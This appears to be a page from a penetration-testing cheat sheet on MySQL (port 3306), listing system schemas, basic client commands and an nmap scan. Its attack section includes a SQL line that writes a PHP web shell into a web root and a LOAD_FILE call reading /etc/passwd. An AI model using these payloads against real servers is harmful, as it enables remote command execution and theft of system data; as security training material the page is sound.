MYSQL - 3306

  • MySQL default system schemas/databases:

    • mysql - is the system database that contains tables that store information required by the MySQL server

    • information_schema - provides access to database metadata

    • performance_schema - is a feature for monitoring MySQL Server execution at a low level

    • sys - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema

CommandDescription

mysql -u <user> -p<password> <IP address>

Connect to the MySQL server. There should not be a space between the '-p' flag, and the password.

show databases;

Show all databases.

use <database>;

Select one of the existing databases.

show tables;

Show all available tables in the selected database.

show columns from <table>;

Show all columns in the selected database.

select * from <table>;

Show everything in the desired table.

select * from <table> where <column> = "<string>";

Search for needed string in the desired table.

Interaction with the MySQL Server

# mysql - Linux

# Connecting to MySQL Server using valid creds
mysql -u root -pP4SSw0rd ip

# After Connecting, Some useful commands
show databases;
select version();
use mysql;
show tables;
select host, users from summary;

# mysql.exe - Windows
C:\> mysql.exe -u username -pPassword123 -h ip

# MySQL - Write Local File
SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';

# MySQL - Secure File Privileges
show variables like "secure_file_priv";

# MySQL - Read Local Files in MySQL
select LOAD_FILE("/etc/passwd");

Nmap

# Scanning MySQL Server
nmap ip -sV -sC -p3306 --script mysql*
PreviousSMB, RPC - 137,138,139,445,111NextMSSQl - 1433

Last updated